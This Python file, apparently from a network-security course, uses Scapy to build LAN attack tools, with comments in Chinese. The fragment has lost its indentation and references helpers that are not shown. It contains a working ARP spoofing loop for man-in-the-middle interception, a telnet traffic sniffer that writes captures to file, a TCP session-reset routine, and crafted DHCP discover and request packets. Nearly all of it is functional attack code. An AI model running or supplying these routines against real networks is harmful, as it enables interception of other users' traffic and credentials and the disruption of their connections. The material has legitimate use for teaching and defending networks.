def arp_spoof(ip_1, ip_2, ifname='Net1'):
global localip, localmac, ip_1_mac, ip_2_mac, g_ip_1, g_ip_2, g_ifname # 申明全局变量
g_ip_1 = ip_1 # 为全局变量赋值,g_ip_1为被毒化ARP设备的IP地址
g_ip_2 = ip_2 # 为全局变量赋值,g_ip_2为本机伪装设备的IP地址
g_ifname = ifname # 为全局变量赋值,攻击使用的接口名字
# 获取本机IP地址,并且赋值到全局变量localip
localip = get_ip_address(ifname)
# 获取本机MAC地址,并且赋值到全局变量localmac
localmac = get_mac_address(ifname)
# 获取ip_1的真实MAC地址
ip_1_mac = arp_request(ip_1, ifname)[1]
# 获取ip_2的真实MAC地址
ip_2_mac = arp_request(ip_2, ifname)[1]
# 引入信号处理机制,如果出现ctl+c(signal.SIGINT),使用sigint_handler这个方法进行处理
signal.signal(signal.SIGINT, sigint_handler)
while True: # 一直攻击,直到ctl+c出现!!!
# op=2,响应ARP
sendp(Ether(src=localmac, dst=ip_1_mac) / ARP(
op=2, hwsrc=localmac, hwdst=ip_1_mac, psrc=g_ip_2, pdst=g_ip_1),
iface=scapy_iface(g_ifname),
verbose=False)
# op=1,请求ARP
# sendp(Ether(src=localmac, dst=ip_1_mac)/ARP(op=1, hwsrc=localmac, hwdst=ip_1_mac, psrc=g_ip_2, pdst=g_ip_1), iface = g_ifname, verbose = False)
# 以太网头部的src MAC地址与ARP数据部分的hwsrc MAC不匹配攻击效果相同
# sendp(Ether(src=ip_1_mac, dst=ip_1_mac)/ARP(op=1, hwsrc=localmac, hwdst=ip_1_mac, psrc=g_ip_2, pdst=g_ip_1), iface = g_ifname, verbose = False)
# 如果采用dst为二层广播,会造成被伪装设备告警地址重叠,并且欺骗效果不稳定,容易抖动!
print("发送ARP欺骗数据包!欺骗" + ip_1 + ',本机MAC地址为' + ip_2 + '的MAC地址!!!')
time.sleep(1)
def telnet_monitor(user_filter, ifname):
# 捕获过滤器匹配的流量, 对流量进行解码
PTKS = sniff(prn=telnet_monitor_callback,
filter=user_filter,
store=1,
iface=scapy_iface(ifname),
timeout=10)
wrpcap("telnet.cap", PTKS) # 保持捕获的数据包到文件
qythexdump(qyt_string) # 解码展示
def tcp_reset(src_ip, dst_ip, dst_port, ifname, src_port=None):
# 本代码主要任务: 搜索匹配过滤条件的数据包,然后使用tcp_monitor_callback方法进行重置会话处理
global global_if
global_if = scapy_iface(ifname)
if src_port is None:
match = "src host " + src_ip + " and dst host " + dst_ip + " and dst port " + dst_port
else:
match = "src host " + src_ip + " and dst host " + dst_ip + " and src port " + src_port + " and dst port " + dst_port
print("开始匹配异常流量" + match)
sniff(prn=tcp_monitor_callback, filter=match, iface=global_if, store=0)
def DHCP_FULL(ifname, MAC, timeout=3):
global Global_IF
Global_IF = ifname
# 发送DHCP Discover数据包
pool.apply_async(DHCP_Discover_Sendonly, args=(Global_IF, MAC))
# 侦听数据包,使用过滤器filter="port 68 and port 67"进行过滤,把捕获的数据包发送给DHCP_Monitor_Control函数进行处理
sniff(prn=DHCP_Monitor_Control,
filter="port 68 and port 67",
store=0,
iface=scapy_iface(Global_IF),
timeout=timeout)
def sigint_handler(signum, frame): # 定义处理方法
global localip, localmac, ip_1_mac, ip_2_mac, g_ip_1, g_ip_2, g_ifname # 引入全局变量
print("\n执行恢复操作!!!")
# 发送ARP数据包,恢复被毒化设备的ARP缓存
sendp(Ether(src=ip_2_mac, dst=ip_1_mac) /
ARP(op=2, hwsrc=ip_2_mac, hwdst=ip_1_mac, psrc=g_ip_2, pdst=g_ip_1),
iface=scapy_iface(g_ifname),
verbose=False)
print("已经恢复 " + g_ip_1 + " ARP缓存")
# 退出程序,跳出while True
sys.exit()
def telnet_rst(user_filter, ifname):
# 本代码主要任务: 使用过滤器捕获数据包, 把捕获的数据包交给telnet_monitor_callback进行处理
global global_if
global_if = scapy_iface(ifname)
PTKS = sniff(prn=telnet_monitor_callback,
filter=user_filter,
store=1,
iface=global_if,
timeout=10)
wrpcap("temp.cap", PTKS)
print(qyt_string)
def DHCP_Request_Sendonly(ifname, options, param_req_list, wait_time=1):
request = Ether(dst='ff:ff:ff:ff:ff:ff', src=options['MAC'],
type=0x0800) / IP(
src='0.0.0.0', dst='255.255.255.255') / UDP(
dport=67, sport=68) / BOOTP(
op=1,
chaddr=chaddr(options['client_id']),
siaddr=options['Server_IP'],
) / DHCP(options=[
('message-type', 'request'),
('server_id', options['Server_IP']),
('requested_addr', options['requested_addr']),
# Hardware_Type = 1(一个字节),需要添加在client_id前面
('client_id', b'\x01' + options['client_id']),
('param_req_list', param_req_list),
('end')
])
if wait_time != 0:
time.sleep(wait_time)
sendp(request, iface=scapy_iface(ifname), verbose=False)
else:
sendp(request, iface=scapy_iface(ifname), verbose=False)
def DHCP_Discover_Sendonly(ifname, MAC, wait_time=1):
Bytes_MAC = Change_MAC_To_Bytes(MAC) # 把MAC地址转换为二进制格式
# param_req_list为请求的参数,没有这个部分服务器只会回送IP地址,什么参数都不给
discover = Ether(dst='ff:ff:ff:ff:ff:ff',
src=MAC,
type=0x0800) / IP(src='0.0.0.0',
dst='255.255.255.255') / UDP(dport=67,
sport=68) / BOOTP(op=1,
chaddr=chaddr(Bytes_MAC)) / DHCP(
options=[('message-type', 'discover'),
('param_req_list',
bytes_requested_options),
('end')])
if wait_time != 0:
time.sleep(wait_time)
sendp(discover,
iface=scapy_iface(ifname),
verbose=False)
else:
sendp(discover,
iface=scapy_iface(ifname),
verbose=False)
def arp_request(ip_address, ifname='ens33'):
# 获取本机IP地址
localip = get_ip_address(ifname)
# 获取本机MAC地址
localmac = get_mac_address(ifname)
try: # 发送ARP请求并等待响应!
result_raw = sr1(ARP(op=1,
hwsrc=localmac,
hwdst='00:00:00:00:00:00',
psrc=localip,
pdst=ip_address),
iface=scapy_iface(ifname),
timeout=1,
verbose=False)
return ip_address, result_raw.getlayer(ARP).fields['hwsrc']
except AttributeError:
return ip_address, None
def DHCP_Sinffer(ifname):
sniff(prn=DHCP_Monitor,
filter="port 68 and port 67",
iface=scapy_iface(ifname),
store=0)